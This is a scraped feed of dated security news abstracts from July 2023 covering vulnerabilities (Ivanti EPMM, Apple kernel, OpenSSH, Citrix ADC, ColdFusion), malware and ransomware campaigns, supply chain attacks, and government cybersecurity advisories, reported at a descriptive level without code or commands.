Ivanti is warning users to update their Endpoint Manager Mobile (EPMM) mobile device management software (formerly MobileIron Core) to the latest version that fixes an actively exploited zero-day vulnerability. Dubbed CVE-2023-35078 , the issue has been described as a remote unauthenticated API access vulnerability that impacts currently supported version 11.4 releases 11.10, 11.9, and 11.8 as well as older releases. It has the maximum severity rating of 10 on the CVSS scale. "An authentication bypass vulnerability in Ivanti EPMM allows unauthorized users to access restricted functionality or resources of the application without proper authentication," the company said in a terse advisory. "If exploited, this vulnerability enables an unauthorized, remote (internet-facing) actor to potentially access users' personally identifiable information and make limited changes to the server." The U.S. Cybersecurity and Infrastructure Security Agency (CISA) said anThe Hacker News
July 25, 2023 – Vulnerabilities
Apple Rolls Out Urgent Patches for Zero-Day Flaws Impacting iPhones, iPads and Macs Full Text
Abstract
Apple has rolled out security updates to iOS, iPadOS, macOS, tvOS, watchOS, and Safari to address several security vulnerabilities, including one actively exploited zero-day bug in the wild. Tracked as CVE-2023-38606 , the shortcoming resides in the kernel and permits a malicious app to modify sensitive kernel state potentially. The company said it was addressed with improved state management. "Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.1," the tech giant noted in its advisory. It's worth noting that CVE-2023-38606 is the third security vulnerability discovered in connection with Operation Triangulation , a sophisticated mobile cyber espionage campaign targeting iOS devices since 2019 using a zero-click exploit chain. The other two zero-days, CVE-2023-32434 and CVE-2023-32435 , were patched by Apple last month. Kaspersky researchers Valentin Pashkov, Mikhail Vinogradov, Georgy KucThe Hacker News
July 24, 2023 – Vulnerabilities
Atlassian Patches Remote Code Execution Vulnerabilities in Confluence, Bamboo Full Text
Abstract
The most severe of these issues, tracked as CVE-2023-22508 (CVSS score of 8.5), was introduced in Confluence version 7.4.0. The second bug, tracked as CVE-2023-22505 (CVSS score of 8.0), was introduced in Confluence version 8.0.0.Cyware
July 24, 2023 – Vulnerabilities
Critical Zero-Days in Atera Windows Installers Expose Users to Privilege Escalation Attacks Full Text
Abstract
Zero-day vulnerabilities in Windows Installers for the Atera remote monitoring and management software could act as a springboard to launch privilege escalation attacks. The flaws, discovered by Mandiant on February 28, 2023, have been assigned the identifiers CVE-2023-26077 and CVE-2023-26078 , with the issues remediated in versions 1.8.3.7 and 1.8.4.9 released by Atera on April 17, 2023, and June 26, 2023, respectively. "The ability to initiate an operation from a NT AUTHORITY\SYSTEM context can present potential security risks if not properly managed," security researcher Andrew Oliveau said . "For instance, misconfigured Custom Actions running as NT AUTHORITY\SYSTEM can be exploited by attackers to execute local privilege escalation attacks." Successful exploitation of such weaknesses could pave the way for the execution of arbitrary code with elevated privileges. Both the flaws reside in the MSI installer's repair functionality, potentially creaThe Hacker News
July 24, 2023 – Vulnerabilities
A flaw in OpenSSH forwarded ssh-agent allows remote code execution Full Text
Abstract
A new flaw in OpenSSH could be potentially exploited to run arbitrary commands remotely on compromised hosts under specific conditions. Researchers from the Qualys Threat Research Unit (TRU) have discovered a remote code execution vulnerability in OpenSSH’s...Security Affairs
July 24, 2023
Lazarus Targets Windows IIS Web Servers for Malware Distribution Full Text
Abstract
ASEC discovered that the North Korean state-sponsored Lazarus APT group is attacking Windows Internet Information Service (IIS) web servers and using them to distribute malware. It is imperative for organizations to adopt stringent measures, including attack surface management, to identify expo ... Read MoreCyware
July 24, 2023 – Solution
Google Messages Getting Cross-Platform End-to-End Encryption with MLS Protocol Full Text
Abstract
Google has announced that it intends to add support for Message Layer Security ( MLS ) to its Messages service for Android and open source implementation of the specification. "Most modern consumer messaging platforms (including Google Messages) support end-to-end encryption, but users today are limited to communicating with contacts who use the same platform," Giles Hogben, privacy engineering director at Google, said . "This is why Google is strongly supportive of regulatory efforts that require interoperability for large end-to-end messaging platforms." The development comes as the Internet Engineering Task Force (IETF) released the core specification of the Messaging Layer Security (MLS) protocol as a Request for Comments ( RFC 9420 ). Some of the other major companies that have thrown their weight behind the protocol are Amazon Web Services (AWS) Wickr, Cisco, Cloudflare, The Matrix.org Foundation, Mozilla, Phoenix R&D, and Wire. Notably missing fromThe Hacker News
July 24, 2023 – General
Experts warn of OSS supply chain attacks against the banking sector Full Text
Abstract
Checkmark researchers have uncovered the first known targeted OSS supply chain attacks against the banking sector. In the first half of 2023, Checkmarx researchers detected multiple open-source software supply chain attacks aimed at the banking sector....Security Affairs
July 24, 2023 – Vulnerabilities
Over 20,000 Citrix Appliances Vulnerable to New Exploit Full Text
Abstract
A new exploit technique targeting a recent Citrix Application Delivery Controller (ADC) and Gateway vulnerability can be used against thousands of unpatched devices, cybersecurity firm Bishop Fox claims.Cyware
July 24, 2023 – Education
How to Protect Patients and Their Privacy in Your SaaS Apps Full Text
Abstract
The healthcare industry is under a constant barrage of cyberattacks. It has traditionally been one of the most frequently targeted industries, and things haven't changed in 2023. The U.S. Government's Office for Civil Rights reported 145 data breaches in the United States during the first quarter of this year. That follows 707 incidents a year ago, during which over 50 million records were stolen. Health records often include names, birth dates, social security numbers, and addresses. This treasure trove of data is used in identity theft, tax fraud, and other crimes. It is the high value of the data that makes healthcare applications such a promising target. The healthcare industry was hesitant to adopt SaaS applications. However, SaaS applications lead to better collaboration among medical professionals, leading to improved patient outcomes. That, combined with SaaS's ability to reduce costs and improve financial performance, has led to the industry fully embracing SaaS solutionsThe Hacker News
July 24, 2023 – Privacy
Apple could opt to stop iMessage and FaceTime services due to the government’s surveillance demands Full Text
Abstract
Apple could opt to pull iMessage and FaceTime services in the U.K. in response to the government's surveillance demands. In light of the government's surveillance demands, Apple might consider withdrawing iMessage and FaceTime services from the U.K. The...Security Affairs
July 24, 2023 – General
Banking Sector Witnesses First-Ever OSS Supply Chain Attack Full Text
Abstract
For the first time, the banking sector has been explicitly targeted by two distinct Open-Source Software (OSS) supply chain attacks that enabled attackers to stealthily overlay the banking sites. O rganizations must equip themselves with the best early threat alerting and sharing platforms that c ... Read MoreCyware
July 24, 2023 – Vulnerabilities
New OpenSSH Vulnerability Exposes Linux Systems to Remote Command Injection Full Text
Abstract
Details have emerged about a now-patched flaw in OpenSSH that could be potentially exploited to run arbitrary commands remotely on compromised hosts under specific conditions. "This vulnerability allows a remote attacker to potentially execute arbitrary commands on vulnerable OpenSSH's forwarded ssh-agent," Saeed Abbasi, manager of vulnerability research at Qualys, said in an analysis last week. The vulnerability is being tracked under the CVE identifier CVE-2023-38408 (CVSS score: N/A). It impacts all versions of OpenSSH before 9.3p2 . OpenSSH is a popular connectivity tool for remote login with the SSH protocol that's used for encrypting all traffic to eliminate eavesdropping, connection hijacking, and other attacks. Successful exploitation requires the presence of certain libraries on the victim system and that the SSH authentication agent is forwarded to an attacker-controlled system. SSH agent is a background program that maintains users' keysThe Hacker News
July 24, 2023 – Attack
Norwegian Government Security and Service Organisation Hit by Cyberattack Full Text
Abstract
Twelve Norwegian government ministries have been hit by a cyberattack, the Norwegian government said on Monday, the latest attack to hit the public sector of Europe's largest gas supplier and NATO's northernmost member.Cyware
July 24, 2023 – Attack
Banking Sector Targeted in Open-Source Software Supply Chain Attacks Full Text
Abstract
Cybersecurity researchers said they have discovered what they say is the first open-source software supply chain attacks specifically targeting the banking sector. "These attacks showcased advanced techniques, including targeting specific components in web assets of the victim bank by attaching malicious functionalities to it," Checkmarx said in a report published last week. "The attackers employed deceptive tactics such as creating a fake LinkedIn profile to appear credible and customized command-and-control (C2) centers for each target, exploiting legitimate services for illicit activities." The npm packages have since been reported and taken down. The names of the packages were not disclosed. In the first attack, the malware author is said to have uploaded a couple of packages to the npm registry in early April 2023 by posing as an employee of the target bank. The modules came with a preinstall script to activate the infection sequence. To complete the rusThe Hacker News
July 24, 2023 – Vulnerabilities
Perimeter81 Vulnerability Disclosed After Botched Disclosure Process Full Text
Abstract
Cybersecurity researcher Erhad Husovic published a blog post in late June to disclose the details of a local privilege escalation vulnerability discovered in Perimeter81’s macOS application.Cyware
July 24, 2023 – General
CISOs are making cybersecurity a business problem Full Text
Abstract
U.S. enterprises are responding to growing cybersecurity threats by working to make the best use of tools and services to ensure business resilience, according to an ISG report.Cyware
July 24, 2023 – Attack
First Known Targeted OSS Supply Chain Attacks Against the Banking Sector Full Text
Abstract
The attackers employed deceptive tactics such as creating fake LinkedIn profiles to appear credible and using customized command and control (C2) centers for each target, exploiting legitimate services for illicit activities.Cyware
July 23, 2023 – General
Security Affairs newsletter Round 429 by Pierluigi Paganini – International edition Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Multiple...Security Affairs
July 23, 2023 – Vulnerabilities
Shadowserver reported that +15K Citrix servers are likely vulnerable to attacks exploiting the flaw CVE-2023-3519 Full Text
Abstract
Researchers reported that more than 15000 Citrix servers exposed online are likely vulnerable to attacks exploiting the vulnerability CVE-2023-3519. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) this week warned of cyber attacks...Security Affairs
July 22, 2023 – Botnet
Multiple DDoS botnets were observed targeting Zyxel devices Full Text
Abstract
Researchers warn of several DDoS botnets exploiting a critical flaw tracked as CVE-2023-28771 in Zyxel devices. Fortinet FortiGuard Labs researchers warned of multiple DDoS botnets exploiting a vulnerability impacting multiple Zyxel firewalls. The...Security Affairs
July 22, 2023 – Breach
Global CDN Service ‘jsdelivr’ Exposed Users to Phishing Attacks Full Text
Abstract
The malicious NPM package, which masqueraded as a legitimate alternative to a popular package, downloaded a phishing HTML code from the jsdelivr CDN service to steal users' credentials.Cyware
July 22, 2023 – Privacy
Apple Threatens to Pull iMessage and FaceTime from U.K. Amid Surveillance Demands Full Text
Abstract
Apple has warned that it would rather stop offering iMessage and FaceTime services in the U.K. than bowing down to government pressure in response to new proposals that seek to expand digital surveillance powers available to state intelligence agencies. The development, first reported by BBC News, makes the iPhone maker the latest to join the chorus of voices protesting against forthcoming legislative changes to the Investigatory Powers Act ( IPA ) 2016 in a manner that would effectively render encryption protections ineffective. Specifically, the Online Safety Bill requires companies to install technology to scan for child sex exploitation and abuse (CSEA) material and terrorism content in encrypted messaging apps and other services. It also mandates that messaging services clear security features with the Home Office before releasing them and take immediate action to disable them if required without informing the public. While the fact does not explicitly call out for the rThe Hacker News
July 22, 2023 – Breach
DHL Investigating MOVEit Breach as Number of Victims Surpasses 20 Million Full Text
Abstract
The United Kingdom arm of shipping giant DHL said it is investigating a data breach sourced back to its use of the MOVEit software, which has been exploited by a Russia-based ransomware group for nearly two months.Cyware
July 22, 2023 – Outage
Coastal Mississippi County Recovering From Ransomware Attack Full Text
Abstract
The local government in George County, Mississippi, was thrown into chaos this weekend when ransomware actors used a discrete phishing email to gain deep access to the county’s systems.Cyware
July 21, 2023 – Government<br {:=”” .fs-4=”” .fw-700=”” .lh-0=”” }=”” <p=”” style=”font-weight:500; margin:0px” markdown=”1”> CISA warns of attacks against Citrix NetScaler ADC and Gateway Devices Full Text
Abstract
The US CISA warns of cyber attacks targeting Citrix NetScaler Application Delivery Controller (ADC) and Gateway devices. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warning of cyber attacks against Citrix NetScaler Application...Security Affairs
July 21, 2023 – Attack
Azure AD Token Forging Technique in Microsoft Attack Extends Beyond Outlook, Wiz Reports Full Text
Abstract
The recent attack against Microsoft's email infrastructure by a Chinese nation-state actor referred to as Storm-0558 is said to have a broader scope than previously thought. According to cloud security company Wiz, the inactive Microsoft account (MSA) consumer signing key used to forge Azure Active Directory (Azure AD or AAD) tokens to gain illicit access to Outlook Web Access (OWA) and Outlook.com could also have allowed the adversary to forge access tokens for various types of Azure AD applications. This includes every application that supports personal account authentication, such as OneDrive, SharePoint, and Teams; customers applications that support the "Login with Microsoft functionality," and multi-tenant applications in certain conditions. "Everything in the world of Microsoft leverages Azure Active Directory auth tokens for access," Ami Luttwak, chief technology officer and co-founder of Wiz, said in a statement. "An attacker with an AAD siThe Hacker News
July 21, 2023 – Attack
Experts believe North Korea behind JumpCloud supply chain attack Full Text
Abstract
SentinelOne researchers attribute the recent supply chain attacks on JumpCloud to North Korea-linked threat actors. JumpCloud is a cloud-based directory service platform designed to manage user identities, devices, and applications in a seamless and secure...Security Affairs
July 21, 2023 – Malware
HotRat: New Variant of AsyncRAT Malware Spreading Through Pirated Software Full Text
Abstract
A new variant of AsyncRAT malware dubbed HotRat is being distributed via free, pirated versions of popular software and utilities such as video games, image and sound editing software, and Microsoft Office. "HotRat malware equips attackers with a wide array of capabilities, such as stealing login credentials, cryptocurrency wallets, screen capturing, keylogging, installing more malware, and gaining access to or altering clipboard data," Avast security researcher Martin a Milánek said . The Czech cybersecurity firm said the trojan has been prevalent in the wild since at least in October 2022, with a majority of the infections concentrated in Thailand, Guyana, Libya, Suriname, Mali, Pakistan, Cambodia, South Africa, and India. The attacks entail bundling the cracked software available online via torrent sites with a malicious AutoHotkey ( AHK ) script that initiates an infection chain designed to deactivate antivirus solutions on the compromised host and ultimately laThe Hacker News
July 21, 2023 – Breach
Nice Suzuki, sport: shame dealer left your data up for grabs Full Text
Abstract
Cybernews research team discovered that two Suzuki-authorized dealer websites were leaking customers' sensitive information. Suzuki or otherwise, buying a new vehicle is an intense experience with complicated credit, insurance, documentation, and contracts....Security Affairs
July 21, 2023 – Malware
HotRat as Hidden Script in Cracked Software Full Text
Abstract
In a recent encounter, security researchers stumbled across a HotRat malware distribution campaign that cybercriminals were offering bundled as cracked programs and games. HotRat is an offshoot of the open-source AsyncRAT framework. Implement strict software policies, regularly update and patch sys ... Read MoreCyware
July 21, 2023 – Malware
Sophisticated BundleBot Malware Disguised as Google AI Chatbot and Utilities Full Text
Abstract
A new malware strain known as BundleBot has been stealthily operating under the radar by taking advantage of .NET single-file deployment techniques , enabling threat actors to capture sensitive information from compromised hosts. "BundleBot is abusing the dotnet bundle (single-file), self-contained format that results in very low or no static detection at all," Check Point said in a report published this week, adding it is "commonly distributed via Facebook Ads and compromised accounts leading to websites masquerading as regular program utilities, AI tools, and games." Some of these websites aim to mimic Google Bard, the company's conversational generative artificial intelligence chatbot, enticing victims into downloading a bogus RAR archive ("Google_AI.rar") hosted on legitimate cloud storage services such as Dropbox. The archive file, when unpacked, contains an executable file ("GoogleAI.exe"), which is the .NET single-file, self-conThe Hacker News
July 21, 2023 – Attack
Android SpyNote Attacks Electric and Water Public Utility Users in Japan Full Text
Abstract
A smishing campaign is targeting Japanese Android users by posing as a power and water infrastructure company and luring victims to a phishing website to download the SpyNote malware.Cyware
July 21, 2023 – Education
Local Governments Targeted for Ransomware – How to Prevent Falling Victim Full Text
Abstract
Regardless of the country, local government is essential in most citizens' lives. It provides many day-to-day services and handles various issues. Therefore, their effects can be far-reaching and deeply felt when security failures occur. In early 2023, Oakland, California, fell victim to a ransomware attack . Although city officials have not disclosed how the attack occurred, experts suspect a phishing email is the most likely cause. As a result, city officials brought down their servers to contain the attack. Governments have been the target to many ransomware attacks and breaches. As most local governments maintain a small IT staff, there is potential for shared passwords, reused credentials, and a lack of multi-factor authentication security, exposing vulnerabilities for a breach. Oakland is Breached It was first noticed on a Wednesday evening in early February; when Oakland, California city officials quickly took most services' backend servers offline and posted a mThe Hacker News
July 21, 2023 – Ransomware
Mallox Ransomware Activity Surges by 174% Full Text
Abstract
Mallox ransomware activity surged by nearly 174% in 2023, using the new variant Xollam, employing the double extortion tactic to demand ransom from victims. The development is also being perceived as more affiliate groups coming together in this mission. Organizations must remain vigilant and adapt ... Read MoreCyware
July 21, 2023 – Denial Of Service
DDoS Botnets Hijacking Zyxel Devices to Launch Devastating Attacks Full Text
Abstract
Several distributed denial-of-service (DDoS) botnets have been observed exploiting a critical flaw in Zyxel devices that came to light in April 2023 to gain remote control of vulnerable systems. "Through the capture of exploit traffic, the attacker's IP address was identified, and it was determined that the attacks were occurring in multiple regions, including Central America, North America, East Asia, and South Asia," Fortinet FortiGuard Labs researcher Cara Lin said . The flaw, tracked as CVE-2023-28771 (CVSS score: 9.8), is a command injection bug affecting multiple firewall models that could potentially allow an unauthorized actor to execute arbitrary code by sending a specifically crafted packet to the targeted appliance. Last month, the Shadowserver Foundation warned that the flaw was being "actively exploited to build a Mirai-like botnet" at least since May 26, 2023, an indication of how abuse of servers running unpatched software is on the rise.The Hacker News
July 21, 2023 – Government
Citrix NetScaler ADC and Gateway Devices Under Attack: CISA Urges Immediate Action Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an advisory on Thursday warning that the newly disclosed critical security flaw in Citrix NetScaler Application Delivery Controller (ADC) and Gateway devices is being abused to drop web shells on vulnerable systems. "In June 2023, threat actors exploited this vulnerability as a zero-day to drop a web shell on a critical infrastructure organization's non-production environment NetScaler ADC appliance," the agency said . "The web shell enabled the actors to perform discovery on the victim's active directory (AD) and collect and exfiltrate AD data. The actors attempted to move laterally to a domain controller but network segmentation controls for the appliance blocked movement." The shortcoming in question is CVE-2023-3519 (CVSS score: 9.8), a code injection bug that could result in unauthenticated remote code execution. Citrix, earlier this week, released patches for the issue andThe Hacker News
July 20, 2023 – General
Renewable technologies add risk to the US electric grid, experts warn Full Text
Abstract
Technologies that underpin solar and wind energy storage systems, which are central to transferring renewable power to the grid, are potential hacking risks, experts noted at a congressional hearing Tuesday.Cyware
July 20, 2023 – Vulnerabilities
Critical Flaws in AMI MegaRAC BMC Software Expose Servers to Remote Attacks Full Text
Abstract
Two more security flaws have been disclosed in AMI MegaRAC Baseboard Management Controller (BMC) software that, if successfully exploited, could allow threat actors to remotely commandeer vulnerable servers and deploy malware. "These new vulnerabilities range in severity from High to Critical, including unauthenticated remote code execution and unauthorized device access with superuser permissions," Eclypsium researchers Vlad Babkin and Scott Scheferman said in a report shared with The Hacker News. "They can be exploited by remote attackers having access to Redfish remote management interfaces, or from a compromised host operating system." To make matters worse, the shortcomings could also be weaponized to drop persistent firmware implants that are immune to operating system reinstalls and hard drive replacements, brick motherboard components, cause physical damage through overvolting attacks, and induce indefinite reboot loops. "As attackers shift theirThe Hacker News
July 20, 2023
Experts attribute WyrmSpy and DragonEgg spyware to the Chinese APT41 group Full Text
Abstract
China-linked group APT41 was spotted using two previously undocumented Android spyware called WyrmSpy and DragonEgg China-linked APT group APT41 has been observed using two previously undocumented Android spyware called WyrmSpy and DragonEgg. The...Security Affairs
July 20, 2023 – Phishing
Phishing via Google Ads Full Text
Abstract
Hackers are using URL redirects within Google ads to lead users to malicious sites, leveraging the trust and legitimacy of Google Ads. This technique, known as BEC 3.0, involves referencing legitimate sites instead of spoofed ones.Cyware
July 20, 2023 – Ransomware
Mallox Ransomware Exploits Weak MS-SQL Servers to Breach Networks Full Text
Abstract
Mallox ransomware activities in 2023 have witnessed a 174% increase when compared to the previous year, new findings from Palo Alto Networks Unit 42 reveal. "Mallox ransomware, like many other ransomware threat actors, follows the double extortion trend: stealing data before encrypting an organization's files, and then threatening to publish the stolen data on a leak site as leverage to convince victims to pay the ransom fee," security researchers Lior Rochberger and Shimi Cohen said in a new report shared with The Hacker News. Mallox is linked to a threat actor that's also linked to other ransomware strains , such as TargetCompany, Tohnichi, Fargo, and, most recently, Xollam. It first burst onto the scene in June 2021. Some of the prominent sectors targeted by Mallox are manufacturing, professional and legal services, and wholesale and retail. A notable aspect of the group is its pattern of exploiting poorly secured MS-SQL servers via dictionary attacks asThe Hacker News
July 20, 2023 – Attack
ALPHV/BlackCat and Clop gangs claim to have hacked cosmetics giant Estée Lauder Full Text
Abstract
The American cosmetics giant company Estée Lauder was hacked by two distinct ransomware groups, the ALPHV/BlackCat and Clop gangs. Yesterday the cybersecurity expert @sonoclaudio first alerted me about a strange circumstance, two ransomware actors,...Security Affairs
July 20, 2023 – Breach
Tampa General Hospital Says Hackers Exfiltrated the Data of 1.2 Million Patients Full Text
Abstract
A security breach was detected on May 31, 2023, when suspicious activity was identified within its network. The affected systems were immediately taken offline to prevent further unauthorized access.Cyware
July 20, 2023 – Vulnerabilities
Apache OpenMeetings Web Conferencing Tool Exposed to Critical Vulnerabilities Full Text
Abstract
Multiple security flaws have been disclosed in Apache OpenMeetings, a web conferencing solution, that could be potentially exploited by malicious actors to seize control of admin accounts and run malicious code on susceptible servers. "Attackers can bring the application into an unexpected state, which allows them to take over any user account, including the admin account," Sonar vulnerability researcher Stefan Schiller said in a report shared with The Hacker News. "The acquired admin privileges can further be leveraged to exploit another vulnerability allowing attackers to execute arbitrary code on the Apache OpenMeetings server." Following responsible disclosure on March 20, 2023, the vulnerabilities were addressed with the release of Openmeetings version 7.1.0 that was released on May 9, 2023. The list of three flaws is as follows - CVE-2023-28936 (CVSS score: 5.3) - Insufficient check of invitation hash CVE-2023-29032 (CVSS score: 8.1) - An authentiThe Hacker News
July 20, 2023 – Malware
P2PInfect, a Rusty P2P worm targets Redis Servers on Linux and Windows systems Full Text
Abstract
Cybersecurity researchers discovered a new peer-to-peer (P2P) worm called P2PInfect that targets Redis servers. Palo Alto Networks Unit 42 researchers have discovered a new peer-to-peer (P2P) worm called P2PInfect that targets...Security Affairs
July 20, 2023 – Outage
Russian Medical Lab Suspends Some Services After Ransomware Attack Full Text
Abstract
Customers of the Russian medical laboratory Helix have been unable to receive their test results for several days due to a “serious” cyberattack that crippled the company's systems over the weekend.Cyware
July 20, 2023 – Attack
North Korean State-Sponsored Hackers Suspected in JumpCloud Supply Chain Attack Full Text
Abstract
An analysis of the indicators of compromise ( IoCs ) associated with the JumpCloud hack has uncovered evidence pointing to the involvement of North Korean state-sponsored groups, in a style that's reminiscent of the supply chain attack targeting 3CX . The findings come from SentinelOne, which mapped out the infrastructure pertaining to the intrusion to uncover underlying patterns. It's worth noting that JumpCloud, last week, attributed the attack to an unnamed "sophisticated nation-state sponsored threat actor." "The North Korean threat actors demonstrate a high level of creativity and strategic awareness in their targeting strategies," SentinelOne security researcher Tom Hegel told The Hacker News. "The research findings reveal a successful and multifaceted approach employed by these actors to infiltrate developer environments." "They actively seek access to tools and networks that can serve as gateways to more extensive opportunitieThe Hacker News
July 20, 2023 – Vulnerabilities
Adobe out-of-band update addresses an actively exploited ColdFusion zero-day Full Text
Abstract
Adobe released an emergency update to address critical vulnerabilities in ColdFusion, including an actively exploited zero-day. Adobe released an out-of-band update to address critical and moderate vulnerabilities in ColdFusion, including a zero-day...Security Affairs
July 20, 2023 – Outage
Estée Lauder Takes Down Some Systems Following Cyberattack Full Text
Abstract
The ALPHV group claims Estée Lauder has not responded and listed the company on its leak site Tuesday, according to activity observed by Emsisoft Threat Analyst Brett Callow.Cyware
July 20, 2023 – General
A Few More Reasons Why RDP is Insecure (Surprise!) Full Text
Abstract
If it seems like Remote Desktop Protocol (RDP) has been around forever, it's because it has (at least compared to the many technologies that rise and fall within just a few years.) The initial version, known as "Remote Desktop Protocol 4.0," was released in 1996 as part of the Windows NT 4.0 Terminal Server edition and allowed users to remotely access and control Windows-based computers over a network connection. In the intervening decades, RDP has become a widely used protocol for remote access and administration of Windows-based systems. RDP plays a crucial role in enabling remote work, IT support, and system management and has served as the foundation for various remote desktop and virtual desktop infrastructure (VDI) solutions. The downside of RDP's widespread use is that a Remote Code Execution (RCE) vulnerability in an RDP gateway can have severe consequences, potentially leading to significant damage and compromising the security and integrity of the affecThe Hacker News
July 20, 2023 – Solution
Microsoft Set to Expand Access to Detailed Logs in the Wake of Chinese Hacking Operation Full Text
Abstract
Microsoft said in a blog post on Wednesday that it will include “access to wider cloud security logs for our worldwide customers at no additional cost” starting in September and that it would increase default log retention from 90 to 180 days.Cyware
July 20, 2023 – Breach
Turla’s New DeliveryCheck Backdoor Breaches Ukrainian Defense Sector Full Text
Abstract
The defense sector in Ukraine and Eastern Europe has been targeted by a novel .NET-based backdoor called DeliveryCheck (aka CAPIBAR or GAMEDAY) that's capable of delivering next-stage payloads. The Microsoft threat intelligence team, in collaboration with the Computer Emergency Response Team of Ukraine (CERT-UA), attributed the attacks to a Russian nation-state actor known as Turla , which is also tracked under the names Iron Hunter, Secret Blizzard (formerly Krypton), Uroburos, Venomous Bear, and Waterbug. It's linked to Russia's Federal Security Service (FSB). "DeliveryCheck is distributed via email as documents with malicious macros," the company said in a series of tweets. "It persists via a scheduled task that downloads and launches it in memory. It also contacts a C2 server to retrieve tasks, which can include the launch of arbitrary payloads embedded in XSLT stylesheets." Successful initial access is also accompanied in some cases by tThe Hacker News
July 20, 2023 – Malware
New P2PInfect Worm Targeting Redis Servers on Linux and Windows Systems Full Text
Abstract
Cybersecurity researchers have uncovered a new cloud targeting, peer-to-peer (P2P) worm called P2PInfect that targets vulnerable Redis instances for follow-on exploitation. "P2PInfect exploits Redis servers running on both Linux and Windows Operating Systems making it more scalable and potent than other worms," Palo Alto Networks Unit 42 researchers William Gamazo and Nathaniel Quist said . "This worm is also written in Rust, a highly scalable and cloud-friendly programming language." It's estimated that as many as 934 unique Redis systems may be vulnerable to the threat. The first known instance of P2PInfect was detected on July 11, 2023. A notable characteristic of the worm is its ability to infects vulnerable Redis instances by exploiting a critical Lua sandbox escape vulnerability, CVE-2022-0543 (CVSS score: 10.0), which has been previously exploited to deliver multiple malware families such as Muhstik , Redigo , and HeadCrab over the past yeThe Hacker News
July 20, 2023 – General
Microsoft Expands Cloud Logging to Counter Rising Nation-State Cyber Threats Full Text
Abstract
Microsoft on Wednesday announced that it's expanding cloud logging capabilities to help organizations investigate cybersecurity incidents and gain more visibility after facing criticism in the wake of a recent espionage attack campaign aimed at its email infrastructure. The tech giant said it's making the change in direct response to increasing frequency and evolution of nation-state cyber threats. It's expected to roll out starting in September 2023 to all government and commercial customers. "Over the coming months, we will include access to wider cloud security logs for our worldwide customers at no additional cost," Vasu Jakkal, corporate vice president of security, compliance, identity, and management at Microsoft, said . "As these changes take effect, customers can use Microsoft Purview Audit to centrally visualize more types of cloud log data generated across their enterprise." As part of this change, users are expected to receive access toThe Hacker News
July 20, 2023 – Vulnerabilities
Adobe Rolls Out New Patches for Actively Exploited ColdFusion Vulnerability Full Text
Abstract
Adobe has released a fresh round of updates to address an incomplete fix for a recently disclosed ColdFusion flaw that has come under active exploitation in the wild. The critical shortcoming, tracked as CVE-2023-38205 (CVSS score: 7.5), has been described as an instance of improper access control that could result in a security bypass. It impacts the following versions: ColdFusion 2023 (Update 2 and earlier versions) ColdFusion 2021 (Update 8 and earlier versions), and ColdFusion 2018 (Update 18 and earlier versions) "Adobe is aware that CVE-2023-38205 has been exploited in the wild in limited attacks targeting Adobe ColdFusion," the company said . The update also addresses two other flaws, including a critical deserialization bug ( CVE-2023-38204 , CVSS score: 9.8) that could lead to remote code execution and a second improper access control flaw that could also pave the way for a security bypass ( CVE-2023-38206 , CVSS score: 5.3). The disclosure arrives daysThe Hacker News
July 19, 2023 – Policy and Law
Legislators say HHS is failing to adequately protect health records from law enforcement Full Text
Abstract
Lawmakers are demanding the Department of Health and Human Services (HHS) to prevent law enforcement from accessing reproductive and other health records without a warrant.Cyware
July 19, 2023 – Education
How to Manage Your Attack Surface? Full Text
Abstract
Attack surfaces are growing faster than security teams can keep up. To stay ahead, you need to know what's exposed and where attackers are most likely to strike. With cloud migration dramatically increasing the number of internal and external targets, prioritizing threats and managing your attack surface from an attacker's perspective has never been more important. Let's look at why it's growing, and how to monitor and manage it properly with tools like Intruder . What is your attack surface? First, it's important to understand that your attack surface is the sum of your digital assets that are 'exposed' – whether the digital assets are secure or vulnerable, known or unknown, in active use or not. This attack surface changes continuously over time, and includes digital assets that are on-premises, in the cloud, in subsidiary networks, and in third-party environments. In short, it's anything that a hacker can attack. What is attack surface managemenThe Hacker News
July 19, 2023 – Botnet
Ukraine’s cyber police dismantled a massive bot farm spreading propaganda Full Text
Abstract
The Cyber Police Department of the National Police of Ukraine dismantled a massive bot farm and seized 150,000 SIM cards. A gang of more than 100 individuals used fake social network accounts to conduct disinformation and psychological operations...Security Affairs
July 19, 2023 – Attack
DangerousPassword Attacks Targeting Developers’ Windows, macOS, and Linux Environments Full Text
Abstract
The targeted attack group DangerousPassword has been continuously attacking cryptocurrency exchange developers since June 2019, using malware that infects Windows, macOS, and Linux environments with Python and Node.js installed.Cyware
July 19, 2023 – Government
CISA and NSA Issue New Guidance to Strengthen 5G Network Slicing Against Threats Full Text
Abstract
U.S. cybersecurity and intelligence agencies have released a set of recommendations to address security concerns with 5G standalone network slicing and harden them against possible threats. "The threat landscape in 5G is dynamic; due to this, advanced monitoring, auditing, and other analytical capabilities are required to meet certain levels of network slicing service level requirements over time," the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the National Security Agency (NSA) said . 5G is the fifth-generation technology standard for broadband cellular networks, offering increased data speeds and lower latency. Network slicing is an architectural model that allows mobile service providers to partition their network up into several independent "slices" in order to create virtual networks that cater to different clients and use cases. The latest advisory builds upon guidance previously issued by the agencies in December 2022, warningThe Hacker News
July 19, 2023 – Government
US Gov adds surveillance firms Cytrox and Intellexa to Entity List for trafficking in cyber exploits Full Text
Abstract
The U.S. government added surveillance technology vendors Cytrox and Intellexa to an economic blocklist for trafficking in cyber exploits. The Commerce Department’s Bureau of Industry and Security (BIS) added surveillance technology vendors Intellexa...Security Affairs
July 19, 2023 – Attack
New Attack Campaign Enters the ‘FakeUpdates’ Arena to Deliver NetSupport RAT Full Text
Abstract
A new campaign called FakeSG, similar to SocGholish, is using hacked WordPress websites to distribute the NetSupport RAT and deliver additional payloads. FakeSG utilizes different layers of obfuscation and delivery techniques.Cyware
July 19, 2023
Chinese APT41 Hackers Target Mobile Devices with New WyrmSpy and DragonEgg Spyware Full Text
Abstract
